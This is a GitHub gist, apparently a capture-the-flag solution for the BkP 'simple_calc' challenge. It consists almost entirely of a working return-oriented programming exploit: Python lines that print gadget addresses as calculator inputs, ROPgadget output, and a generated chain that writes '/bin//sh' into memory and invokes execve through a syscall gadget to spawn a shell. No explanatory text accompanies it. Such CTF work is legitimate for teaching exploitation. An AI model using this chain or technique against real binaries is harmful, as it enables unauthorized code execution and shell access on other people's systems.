Create a gist now

Instantly share code, notes, and snippets.

@eugenekolo /pwn.py
Last active Apr 10, 2016

What would you like to do?
Ropchain for BkP simple_calc
print(2);print(int(0x0000000000401c87)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x00000000006c1060)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x000000000044db34)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x6e69622f)+100);print(100);print('');
print(2);print(int(0x68732f2f)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000470f11)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000401c87)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x00000000006c1068)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x000000000041c61f)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000470f11)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000401b73)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x00000000006c1060)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000401c87)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x00000000006c1068)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000437a85)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x00000000006c1068)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x000000000041c61f)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000463b90)+100);print(100);print('');print(2);print(100);print(100);print('');
print(2);print(int(0x0000000000400488)+100);print(100);print('');print(2);print(100);print(100);print('');
254
2
100
99
2
100
98
2
100
97
2
100
96
2
100
95
2
100
94
2
100
93
2
100
92
2
100
91
2
100
90
2
100
89
2
100
88
2
100
100
2
100
100
2
100
85
2
100
84
2
100
83
2
100
82
ROP chain generation
===========================================================
- Step 1 -- Write-what-where gadgets
[+] Gadget found: 0x470f11 mov qword ptr [rsi], rax ; ret
[+] Gadget found: 0x401c87 pop rsi ; ret
[+] Gadget found: 0x44db34 pop rax ; ret
[+] Gadget found: 0x41c61f xor rax, rax ; ret
- Step 2 -- Init syscall number gadgets
[+] Gadget found: 0x41c61f xor rax, rax ; ret
[+] Gadget found: 0x463b90 add rax, 1 ; ret
[+] Gadget found: 0x463b91 add eax, 1 ; ret
- Step 3 -- Init syscall arguments gadgets
[+] Gadget found: 0x401b73 pop rdi ; ret
[+] Gadget found: 0x401c87 pop rsi ; ret
[+] Gadget found: 0x437a85 pop rdx ; ret
- Step 4 -- Syscall gadget
[+] Gadget found: 0x400488 syscall
- Step 5 -- Build the ROP chain
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = ''
p += pack('<Q', 0x0000000000401c87) # pop rsi ; ret
p += pack('<Q', 0x00000000006c1060) # @ .data
p += pack('<Q', 0x000000000044db34) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x0000000000470f11) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401c87) # pop rsi ; ret
p += pack('<Q', 0x00000000006c1068) # @ .data + 8
p += pack('<Q', 0x000000000041c61f) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000470f11) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401b73) # pop rdi ; ret
p += pack('<Q', 0x00000000006c1060) # @ .data
p += pack('<Q', 0x0000000000401c87) # pop rsi ; ret
p += pack('<Q', 0x00000000006c1068) # @ .data + 8
p += pack('<Q', 0x0000000000437a85) # pop rdx ; ret
p += pack('<Q', 0x00000000006c1068) # @ .data + 8
p += pack('<Q', 0x000000000041c61f) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463b90) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000400488) # syscall
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment